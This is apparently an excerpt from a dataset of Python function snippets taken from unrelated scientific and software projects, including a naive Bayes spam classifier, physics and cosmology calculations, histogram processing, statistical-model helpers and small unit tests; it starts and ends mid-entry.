fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 
0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, 
l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = 
fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def test_put_nveto_pmt_item(self):\n pass", "def intf_MIDN(E):\n inputok= False\n if E.The.StackSize() >= 3: # Ensure something is here.\n checkob= E.The.StackCopyItemLast() \n if checkob.whatami == \"VAL\":\n inputok= True\n if not inputok or not inc.point_formatted_LST(E.The,2) or not inc.point_formatted_LST(E.The,3):\n print(\"Input Error: midn\")\n print(intf_MIDN.__doc__)\n return # Without doing much of anything.\n ratio= E.The.StackPop().val\n P1object= E.The.StackPop()\n #P1= map(lambda x:x.val, P1object.val) # Should now be a list of floats.\n P1= [x.val for x in P1object.val] # Should now be a list of floats.\n P0object= E.The.StackPop()\n #P0= map(lambda x:x.val, P0object.val) # Should now be a list of floats.\n P0= [x.val for x in P0object.val] # Should now be a list of floats.\n x= (P1[0]-P0[0]) * ratio + P0[0]\n y= (P1[1]-P0[1]) * ratio + P0[1]\n z= (P1[2]-P0[2]) * ratio + P0[2]\n z= objectifier.StackOB_VAL(z) # Can't be just regular Python ints.\n y= objectifier.StackOB_VAL(y)\n x= objectifier.StackOB_VAL(x)\n p= objectifier.StackOB_LST([x, y, z])\n p.names= ['x','y','z']\n E.The.StackPush(p)", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = 
np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n 
Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def prove_I0() -> Proof:\n # Task 4.8", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def eulerphi(n):\n\treturn euler_phi(n)", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). 
They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n 
doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. 
#r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, 